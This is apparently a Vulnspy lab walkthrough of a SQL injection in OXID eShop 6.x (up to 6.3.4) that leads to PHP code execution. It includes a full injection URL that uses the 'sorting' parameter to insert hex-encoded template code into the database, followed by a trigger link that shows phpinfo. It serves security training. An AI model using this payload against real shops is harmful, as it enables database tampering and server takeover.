OXID eShop 6.x <= 6.3.4 SQL Injection (SQLi) to RCE Vulnerability Exploit


Introduction

RIPS Tech disclosed a SQL injection vulnerability in OXID eShop in June 2019, which can lead to arbitrary SQL statement execution and can be used by attackers to execute arbitrary PHP code.

OXID eShop is a free open source ecommerce and shopping cart solution. And it originating from Germany and its enterprise edition is used by industry leaders such as Mercedes, BitBurger and Edeka. The aSorting parameter in SESSION was not filtered in OXID eShop version 6.x <= 6.3.4, resulting in a SQL injection vulnerability. Detailed vulnerability analysis can be found at: WARNING: Pre-Auth Takeover of OXID eShops

Exploit

1.Click the Start to Hack button in the upper right corner of the page to create an online OXID eShop environment

2.Click on any product item in the web page.

e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html

3.Add sorting parameter after the URL of item detail ( Insert PHP code to database via SQL injection )

e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert into oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION) 
VALUES(0x313233343536,0x76756c6e73707964656d6f, 0x00, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 0x434d53464f4c4445525f55534552494e464f, 0x00);%23

4.Accessing the following links triggers PHP code execution and will display the PHPINFO page if exploited successfully.

http://***.vsgo.cloud/source/index.php?cl=content&oxloadid=vulnspydemo

Ref

All rights reserved. © 2020 VULNSPY